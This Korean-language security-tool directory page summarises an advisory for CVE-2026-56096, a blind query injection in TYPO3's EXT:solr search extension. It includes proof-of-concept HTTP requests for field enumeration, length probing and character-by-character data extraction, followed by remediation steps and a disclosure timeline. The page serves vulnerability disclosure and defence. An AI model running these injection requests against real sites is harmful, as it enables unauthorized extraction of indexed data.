Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/yairhinkis/cve-2026-56096
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringWeb SecurityPapers & Research
GitHubyairhinkis/cve-2026-56096

CVE-2026-56096

CVE-2026-56096에 대한 개념 증명 및 기술 분석 문서로, TYPO3 EXT:solr에서 발생하는 블라인드 Solr 쿼리 인젝션으로 인해 인증 없이 필드 열거 및 데이터 추출이 가능하다.

저장소 보기
9시간 56분 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-56096: TYPO3 EXT:solr의 Solr 쿼리 인젝션 및 블라인드 데이터 추출

공식 TYPO3 Apache Solr 확장(EXT:solr / apache-solr-for-typo3/solr)에서 아키텍처적 보안 취약점이 발견되었습니다. 이 문제는 인증되지 않은 원격 공격자가 검색 매개변수 tx_solr[q]를 통해 임의의 Solr/Lucene 쿼리 구문을 주입할 수 있게 하여, 검색 인덱스로부터 무단 블라인드 필드 열거 및 전체 메타데이터 추출을 가능하게 합니다.


메타데이터

  • CVE ID: CVE-2026-56096
  • 취약점 유형: CWE-943: 데이터 쿼리 로직 내 특수 요소의 부적절한 중화
  • 대상 구성 요소: EXT:solr (검색 매개변수: tx_solr[q])
  • CVSS v4.0 점수: 6.3 (Medium) — CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N
  • 연구자: Yair Hinkis

취약점 개요

EXT:solr 확장은 tx_solr[q] 매개변수를 통해 사용자가 제공한 검색어를 받아 Apache Solr 엔진으로 전달합니다. 설계상 이 확장은 와일드카드(*), 단일 문자 와일드카드(?), 필드 선택자(:), 범위 쿼리([a TO z])와 같은 특정 쿼리 연산자를 허용하여 패싯 필터링과 같은 정당한 기능을 지원합니다.

이러한 문자들이 강제 화이트리스트나 쿼리 추상화 계층 없이 백엔드 쿼리 구성에 직접 전달되었기 때문에, 공격자는 필드별 구문을 제공하여 의도된 검색 경계를 벗어날 수 있습니다. 이를 통해 인증되지 않은 사용자가 내부 Solr 필드를 직접 쿼리하고 불리언 기반 블라인드 기법을 사용하여 인덱스 데이터를 추출할 수 있습니다.


공격 기법

1. field:*를 통한 필드 열거

임의의 또는 추측한 필드 이름에 와일드카드를 추가함으로써, 공격자는 해당 필드가 스키마 내에 존재하는지 확인할 수 있습니다:

root@kitploit:~
GET /search?tx_solr[q]=siteHash:* HTTP/1.1
Host: target.example.com

필드가 존재하면 Solr는 일치하는 모든 레코드에 걸쳐 쿼리를 처리하며(종종 서로 다른 응답 코드나 볼륨 관련 동작을 유발함), 이를 통해 자동화된 워드리스트 기반 필드 열거가 가능합니다.


2. 접두사 와일드카드를 통한 블라인드 값 추출

공격자는 불리언 추론을 사용하여 민감한 필드 값을 문자 단위로 추출할 수 있습니다:

root@kitploit:~
GET /search?tx_solr[q]=siteHash:a* HTTP/1.1  --> Returns search hits (Value begins with 'a')
GET /search?tx_solr[q]=siteHash:b* HTTP/1.1  --> "Nothing found" (Value does not begin with 'b')


3. ? 연산자를 통한 길이 탐지

단일 문자 와일드카드 연산자(?)는 문자 반복을 시작하기 전에 저장된 문자열의 정확한 길이를 판별할 수 있습니다:

root@kitploit:~
GET /search?tx_solr[q]=siteHash:????????????* HTTP/1.1   (Checks for 12+ characters)
GET /search?tx_solr[q]=siteHash:?????????????* HTTP/1.1  (Checks for 13+ characters)


4. 가속화된 범위 쿼리 ([a TO z])

범위 쿼리는 초기 문자에 대한 이진 검색 추출을 허용하여, 문자 위치당 필요한 요청 수를 26회에서 약 5회로 줄입니다:

root@kitploit:~
GET /search?tx_solr[q]=siteHash:[a TO m] HTTP/1.1  --> Determines if character falls within 'a'-'m'
GET /search?tx_solr[q]=siteHash:[n TO z] HTTP/1.1  --> Determines if character falls within 'n'-'z'

길이 탐지, 범위 쿼리, 접두사 와일드카드를 결합하면 최소한의 요청으로 전체 필드 추출이 가능합니다.


영향

  • 기밀성 침해: Apache Solr에 인덱싱된 모든 필드(예: 내부 시스템 해시, 숨겨진 페이지 콘텐츠, 사용자 관련 메타데이터, 시스템 식별자)의 전체 추출.
  • 접근 제어 우회: 프론트엔드 검색 필터 및 TypoScript 표시 제한을 우회합니다.
  • 범위: EXT:solr 검색 엔드포인트를 사용하는 모든 기본 설치에 영향을 미쳤습니다.

해결 방안

* 및 :와 같은 연산자가 의도된 검색 기능을 수행하므로 전역 문자 이스케이프는 불충분합니다. 해결을 위해서는 애플리케이션 계층의 화이트리스트와 파싱 모델이 필요합니다:

  1. Solr 엔진으로 전달하기 전에 사용자가 제공한 쿼리 문자열을 추상 구문 트리(AST)로 파싱합니다.
  2. 허용 가능한 필드 대상에 대해 엄격한 허용 목록을 적용하여, 내부 또는 제한된 필드에 대한 직접적인 사용자 쿼리를 금지합니다.
  3. 신뢰할 수 없는 입력 컨텍스트에서 발생하는 비화이트리스트 연산자 악용을 중화합니다.

협력적 공개 타임라인

  • 2026년 3월 6일: 승인된 평가 중 취약점 식별, 벤더에 최초 통보.
  • 2026년 4월 17일: 벤더가 로컬 엣지 완화 조치를 구현하고 업스트림 버그 성격을 확인.
  • 2026년 5월 8일: TYPO3 보안 팀([email protected])에 공식 취약점 보고서 제출.
  • 2026년 6월 15일: TYPO3 보안 팀이 재현을 확인하고 확장 유지관리자와 함께 패치 개발을 시작.
  • 2026년 8월 25일: 공식 보안 공지 발행, 패치 게시, CVE-2026-56096 할당.

참고 자료

  • TYPO3 보안 권고: TYPO3-EXT-SA-2026-025
  • CWE 정의: CWE-943: Improper Neutralization of Special Elements in Data Query Logic
도구 다운로드